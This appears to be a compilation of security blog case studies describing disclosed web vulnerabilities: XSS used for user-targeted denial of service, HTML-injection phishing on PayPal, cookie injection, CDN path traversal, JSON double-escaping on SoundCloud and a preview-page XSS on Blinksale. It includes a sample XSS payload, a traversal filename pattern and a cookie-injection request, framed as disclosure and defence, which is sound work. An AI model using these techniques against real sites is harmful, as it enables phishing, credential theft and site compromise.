DoS: Back From The Dead?

Stay updated on FogMarks

Happy 2018!

January is the perfect after-holidays time to point out our goals for the next year. And to lose some weight (because of the holidays), of course!
FogMarks always aims to write the most interesting case-studies about the latest “hot” vulnerabilities, and 2018 is going to be super-exciting!

So, finally after a long break here we are again discussing a vulnerability that many though was dead: the Denial of Service attack.
I’ve heard a lot of statements in the sec community regarding DoS attacks and vulnerabilities. Most of them addressed DoS as “an attack of the past”, as a vulnerability that cannot affect the server side anymore, thanks to companies such as Cloudflare, Nexusguard and other load-balancing service providers.

As a result, a lot of bug bounty programs aren’t accepting DoS vulnerability submissions, and sometimes even forbid the researcher from testing, in fear of an affect on the system’s stability and user experience. And their right, sort of.

But- who said that a DoS attack has to be on the server? It takes two to tango – if the server is now “protected” against DoS attacks (by an anti-DoS/DDoS service), who is protecting the user?

Let me elaborate on that: Companies are too busy preventing DoS attacks on their servers, that they are forgetting that DoS attacks are possible against users as well. A Denial of Service attack, to my definition, is any attack which prevents a user from accessing a resource or a service from the server. This can be done by directly attacking the server – like trying to make him “shutdown” from over-traffic – or by directly attacking the users.

Actually, attacking the users is the more easy way to do it. In addition, in a lot of cases the company won’t even know that the user was attacked until the user will contact the company and say “Hey, I cannot access X”.

You all know what I’m about to say now. Which type of vulnerability can cause a DoS attack super fast to a specific user? An XSS of course!

Sending or planting an XSS payload which disrupts a certain service onto specific user/users causes a severe denial of service/resource to that user or users. This payload can be a simple redirection outside of the site, or even “document.write(”);” that is simply printing a white page or a misleading page.

A certain very known commercial company, which hasn’t allowed us to mention it’s name yet suffered from that exact attack.
When I first started to research their main product, I was told not to DoS or DDoS their servers, “because we have an anti-DDoS mechanisms that are preventing that, and we think DoS attack belongs to the past”. Of course that DoS from a different angle was the next thing I have done on their product 🙂

I come to understand that an XSS payload can be sent directly to a specific user or to a users group. That XSS was “universal” – it was executing from any page of the site, because of the messaging feature that appeared in any page. I planted an XSS payload which simply echoed a mock “404 Not Found” page onto the page. To prove that this issue was indeed severe, me and the head of their security response team have test the attack on the production site, against one of the developers. He response (“WTF? What happened to the site?”) was hilarious.

Although most of the modern servers are now vulnerable to DoS and DDoS attacks thanks to smart load balancing and malicious requests blocking services, the user is still out there – unarmed and unprotected. You should always treat any type of attack that can prevent an action from being fulfilled as a major security issue, regardless of the type of the vulnerability.

Happy & Successful 2018!

Phishing++ – Chapter II

Stay tuned on FogMarks

Hi! Long-time-no-case-studied.
I know, I know, this chapter was supposed to be released two weeks ago, but we waited for PayPal‘s official permission to disclose this two vulnerabilities before even starting to write the case-study (why? Read our about page).

So, finally – PayPal kindly allowed us to disclose two HTMLi/XSS vulnerabilities they had in the last summer, and that’s perfect because now we can show you a real life scenario that actually happened.
Before reading this, please make sure you fully read and understand the previous chapter. This is vital for this final chapter – its like you cannot start watching Breaking Bad from the second season (Although I know a guy who did it, because he was lazy downloading the first season. Weirdo.)

In the last chapter we talked about what companies can do to prevent 3rd party malicious phishing websites from using their HTML entities such as images, JS scripts and CSS style-sheets.
Today we are going to talk about the most dangerous & complicated Phishing attacks – phishing attacks that occur on the official website.

In the past, Phishing was super-easy. New internet users didn’t understand the importance or even the existence of an official domain. They were used to access their desired websites by a bookmark, by a mail someone sent them and later on – by Google.
Later on, Phishing became less easy. Companies started to warn their users from accessing their site from wrong sources like email messages or forum links. They made their users aware of the domain part of the browser’s window. And indeed, most users have adapted to these security precautions and now double-check the domain their viewing before making any action.

But no one prepared the companies for this new stage of Phishing attacks: Phishing on the official companies websites!Imagine that a malicious deceptive page is being inserted to the website under the official company domain.
A malicious file doesn’t have to be even uploaded – existing pages by the company can be altered by attackers – using XSSes, HTML Injections, Headers Injections or Parameter injections – and malicious content will be displayed.

Actually, there only one TV series about “Cyber” security I appreciate: CSI:Cyber. They presented this exact case of HTML Injection in their 10th episode of the first season.

Ok, now that we learned how to swim – let’s jump to the middle of the ocean.
PayPal suffered from two XSS/HTML Injection vulnerabilities which allowed 3rd-party malicious content to be added to official PayPal pages under the official ‘’ domain.

This allowed us to create some very nice Phishing templates, such as:

In addition, we were able to actually create a <form> inside a page, which allowed us to send the credit card data of victims to a 3rd party websites. Unfortunately, this demo was not allowed to be published.

I even created an online ‘Web Gun’ Content Spoofer which can inject HTML entities directly to a vulnerable page:

The fix
Actually, there is no easy fix. Haunting down vulnerabilities and paying attention to payloads that are being injected to the website pages – via GET/POST requests or via SQL queries (in case of a permanent XSS) is pretty much the best way to handle this threat.
XSS Auditors – like presented in PayPal’s case – simply don’t work.

Writing this 2-chapters sequel was very fun. Expect similar case-studies in the near future.
But till then,

Cookies And Scream

Whoa, What a summer!
I know, we haven’t been active in the last month – blame that on the heat and on my addiction to the sea. I should really get a swimming pool.

OK, enough talking! The summer is almost over and now its time to step on the gas pedal full time.
Today’s case-study also discusses proper user-supplied input handling, but with a twist.

I feel like I talked enough about the importance of properly handling and sanitizing user supplied input. There are tons of XSS and HTML filters out there, and they are doing pretty good job.
But user input doesn’t always being shown onto the page or inserted into the DB. In some cases, many popular web platforms stores it in a cookie.

PayPal, for example, inserts the value of the GET parameter ‘cmd’ as the value of the cookie ‘navcmd’:

Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8,he;q=0.6

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: must-revalidate, proxy-revalidate, no-cache, no-store
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Date: Wed, 30 Aug 2017 21:15:04 GMT
Content-Length: 8764
Connection: keep-alive
Set-Cookie: navcmd=test;; path=/; Secure; HttpOnly

There’s no evil with storing user supplied input in a cookie, and its actually a good practice sometimes, if you don’t want to use sessions or other similar mechanism.
A very common use for user supplied input in a cookie is storing a redirect URL: Sometimes you want to remember from which page the user came from, or to where redirect him at the end of the process. Keep that in mind.
Before I’ll get to the vulnerability itself, I’ll tease you a bit and say that this time, the malicious payload bypassed the XSS & HTML sanitation mechanism.

A very known financing company had this exact cookie functionality. User input from some GET parameters has been stored in some cookies. For example, the value of the GET parameter ‘redirect_url’ was stored in the cookie ‘return_url’. This cookie was then used by dozens of other pages in order to redirect users to a “thank you” page. An open redirect attack on that parameter was not possible, because the value of the GET parameter ‘redirect_url’ has been checked & verified before allowing it to be added as a cookie.

At first glance – everything looks fine. I’ve read the JS code that was responsible for sanitizing the input and determined that its doing its job pretty well – no HTML entities or other “bad” characters (like ‘, “) were able to be reflected – thanks to the encodeURI function that was being used intensively.

And then it hit me. encodeURI doesn’t encode characters like ; or = – The exact characters that are being used when setting a cookie!
So, a GET request to the vulnerable URL, without the ‘return_url’ GET parameter (to prevent collisions):

GET;return_url= HTTP/1.1

HTTP/1.1 200 OK
Set-Cookie: vulnGETParameter=xyz;return_url=;; path=/; Secure; HttpOnly

The result of this in some cases was an open redirect in pages that relied on the fact the value of ‘return_url’ will always be safe.

When you decide to store user input in a cookie, you must know how to treat it well, and you must remember to dispose it when the time is right. In this case, using the same sanitation mechanism for input that will be shown onto the page and input that will be inserted to a cookie is wrong.
The patch here was simple: instead of using encodeURIencodeURIComponent() was used.

Happy & chilled autumn folks!

Independence Is Not a Dirty Word

Follow us @

Happy new year! This is the first post for year 2017.
I hope you guys weren’t too hangovered like I did. Seriously.

As promised in the last case-study, today we are going to see a very interesting case-study, with an interesting twist.

Everyone seems to love jQuery. This awesome Javascript library is everywhere I look — dozens of thousands of companies use it in their website applications, and it is super convenient — especially when it comes to AJAX requests — importing jQuery makes our lives a whole lot easier.

A library of libraries

jQuery is not alone. Google and Microsoft (and sometimes Mozilla and Apple, Facebook and Twitter as well) release new JS libraries all the time, and advice developers to use them and to import them to their products. For example, if you want to play a QuickTime video, you should import Apple’s QuickTime JS library, and if you want that neat jQuery DatePicker, you should import that library from Google, jQuery or any other mirror.

Count the times I used the word ‘import’ in the last paragraph. Done? 4 times.
Whenever we want to use a certain public JS library, which belongs to a certain company or service, we directly import it from that company.
To be more clear, we simply place a <script> tag on our website, with a ‘src’ property pointing to the JS file address:

<script src=”http/s://></script>

Did you get it? We are loading a script from another website — a 3rd party website — to our website’s context. We are violating the number one rule of web security — we trust other website!

Now, this might sound a little stupid

Why shouldn’t I be able to import a script from a trustworthy company like jQuery, Microsoft or Google? And you are right. Kind of.

When you are importing a script from a trustworthy company, in 90% of the time you will be importing it from the company’s CDN.
CDNs stands for Content Delivery Network, and it is (quoted:) “a system of distributed servers (network) that deliver webpages and other Web content to a user based on the geographic locations of the user, the origin of the webpage and a content delivery server.”

Its an hosting service which provides storage services to the company’s clients based on their location and a few other factors. The JS file you are importing is not being kept on the company’s official server (again- most of the times).

In this case-study we’ll see how a very popular company has fell for this

This company (which, of course, we cannot reveal) has developed a popular JS library and hosted it on a 3rd party CDN they purchased. That CDN was “smart” and redirected users to the closest server according to the user’s location:

When a request arrived to the main server, the server determined the location of the request’s IP and then routed the request to the nearest server according to the determined location.

Dozens of websites have planted a <script src> tag in their source code, pointing to that company’s main server CDN, and it has provided their users with the necessary JS library.

An (un)pleasent surprise

After doing some research on the Apache server that was installed on Server C (Copy C in the image), we have concluded that it’s version was really out of date, and that it was vulnerable to an Arbitrary File Upload attack, which allowed us to upload a file to the CDN (but not to execute code).
Not that serious, at first glance.

But! When we examined the way the file was being uploaded, unauthorisedly of course, we saw that it is possible to use a Directory Traversal on the file path. We simply changed the filename to ../../../<company’s domain>/<product name>/<version>/<jsfilename>.js And we were able to replace the company’s legitimate JS file with a malicious one.

Basically, we had an XSS on dozens of websites and companies, without even conducting one minute of research against them. The funny thing was that this attack affected only users who got directed to the vulnerable server (Server C).

What can we learn from this (TL;DR)

Never trust 3rd party websites and services to do your job! I told you that millions of times already. Be independent. Be a big boy that can stay alone in the house.

The safest solution will be to manually download the JS libraries files you use and keep them on your server.

But what happens when the JS libraries I’m using get updated?

Clearly, with the suggested method there is no easy way to keep track of it, besides using a Package Manager like Bower. All you’ll have to do is to synchronise your libraries every once in a while.

Before Javascript Package Managers were popular, I’ve advised a friend of mine to simply write a cronjob or a python script that will check the latest version of the JS library available on the company’s server and then compare it to the local one. If the versions does not equal — the script sends an email to the tech team.
Big JS libraries don’t get updated that often.

So, after the horror movie you just watched, The next thing you are going to do, besides coffee, is to download your 3rd party libraries to your server.


JSON Escaping Out In The Wild (The 10-Minutes XSS)

This case-study focuses on the core aspects and utilities of JSON, specifically its escaping method., such as many others, uses JSON to fetch user-relative information from the server.
The idea is simple, the server sends the client the HTML (and the Javascript, CSS, images etc) first, and then the javascript code uses AJAX to fetch the data from the server.

In this case, the data from the server returns in a JSON format, and the javascript code knows to dissect it and to insert the data in the right places of the page.
The returned data is being escaped (probably) by the JSON escaper mechanism, so any malicious payloads won’t work.

The main question that should be asked here is: can we exploit the way the browser fetches the data? Can we make it fetch arbitrary HTML or Javascript code?

Well, the short answer is no.
The long answer (10 minutes after starting this research) is yes.

At first, I decided to focus on the notifications area (, where I noticed thatAJAX requests are being executed when scrolling done (to fetch old notifications).

I have previously inserted some payloads in variant locations on SoundCloud, and analyzed the way theAJAX asks for more notifications.
To safely print “bad” characters (‘,”,<,….), the JSON escapes them by putting a \ char before any “bad” character.

And so I started thinking.

What if i’ll do the escaping myself? Will the JSON still escapes it?

Well, it did. The JSON escaper mechanism ‘double-escaped’ payloads that were already escaped. All there was left to do was to pre-escape a payload, which caused to a stored XSS at the notification area.

JSON escaping must be done properly
The only reason why this worked is the assumption of the developers that no one will “pre-escape” their input before submitting it. The JSON mechanism always escaped the input (by adding ” or ‘ chars before it). If you are expecting user’s input to be outputted by a 3rd-party code, you should:
1. Never allow direct use of HTML/Script tags. If you must, allow users to use ‘special chars’ to design their input (such as *bold* instead of <b>).
2. Know the mechanism. JSON adds ” or ‘ before the text. Therefore, if you accept these chars from the user – simply URL encode them.

I’ll use this opportunity to note that the response team of SoundCloud was the fastest one I have ever worked with. Take a look at the disclosure timeline.

Disclosure Timeline
13/02/2016 23:00 – Vulnerability found & reported.
14/02/2016 08:00 – Vulnerability confirmed by Soundcloud.
14/02/2016 14:00 – Vulnerability patched and bounty awarded (HoF + Swag).

Ancient Purifying


One of the first XSSes I have found was the easiest one you can imagine. There are millions, yes – millions, of websites that sanitize users input, but sanitize it wrong.

Why? because they’re agnostics. And because they don’t update their sanitizing algorithm according to the latest black/white hat community discoveries.

Purifying Basics

Basically, user input should never be outputted as HTML code. The server, by rule, should not accept HTML tags, but when you decide to accept them, you need to sanitize properly. Why? Because a small mistake in the regex you are writing will lead users to plant stored or reflective XSSes that will jeopardize your users. And you.

An example of this statement will be an ongoing report of mine. / is vulnerable to a very simple stored-XSS attack, using a very simple payload, which of course I will not disclose until they’ll fix the issue (the vulnerability submission is waiting for their response since 2015 (!)).
The rule with sophisticated platforms is to kiss (keep it super simple). Known XSSes will probably won’t work, since a trained security team monitors these systems all the time, and the sanitizing algorithm is being updated frequently.

3rd-party Purifiers aren’t always the answer

As you already know, I don’t believe that your security should be protected by 3rd party software. If you are enough of a “big boy” to store sensitive user data (of any kind), you should also be responsible enough to keep this data safe.
Use your’e own sanitizing mechanism, based on the simple ‘do not accept HTML/SCRIPT tags’ rule, and on the recent community discoveries.

Test your mechanism, open-source it

Perfection not always has it price (Sorry Stella). A perfect input purifier mechanism will become such one only with the help of the community. Therefore, allow pentesters to challenge your mechanism, when you think its vital enough. @soaj1664ashar did such thing with his version of input purifier. You are strongly advised to look at his post about it (Google it).


To finish up, I’ll leave you with this outstanding quote which basically concludes everything we discussed about:

“Security is not a product, but a process” -Bruce Schneier.

Happy new year!

When Previewing Becomes Dangerous


Previewing is cool. A lot of web sites and services offer a ‘preview before posting’ or ‘preview before buying’ option.
But sometimes previewing becomes a dirty business. Like in this case-study your’e about to hear.

Feature Stretching offers an ‘Invoice Preview’ feature before you send an invoice request to another user on their web (or via email). You enters an invoice message on a simple, small textbox. HTML and Javascript codes are being forbidden and escaped when the message is sent.
Before sending the invoice, your are allowed to preview the message you are about to send to the client. Clicking on the preview button opens a pop up window which shows an example of the invoice.

When I clicked on ‘preview’ I noticed that the ‘Enter’ char I inserted was translated to a ‘<br />’ text on the GET message body parameter (in the URL). I changing the input to </script><svg onload=alert(document.domain)></svg> didn’t work. That was the stage where I’ve started to think.

Fun Part

I have decided to analyze each GET parameter in the request, and noticed that one of them was referring to a template id.
The template id was wrapping the message with a nice css and some images. It changes the background color, the foreground color and the font of the input. Then I figured: “Hmm, the template determines the input’s font. Maybe it also reads the input and has an XSS filter on the it?.

I wondered: What if the template id will be of a non-existent template? I changed the id to some random number, entered the XSS payload again and bamIt worked.



The XSS filter was set per-template, which means that it worked only when an existing template id was supplied. When I supplied a non-existent template id – there was no XSS filter, no nice css or images, but still the payload was generated, which resulted with a nice reflected XSS.


Allowing only some of the parameters of a request to affect the output might be risky. Always be aware of the impact and the importance of any parameter you use, even the smallest one.

Blinksale patched this issue and personally thanked me via email.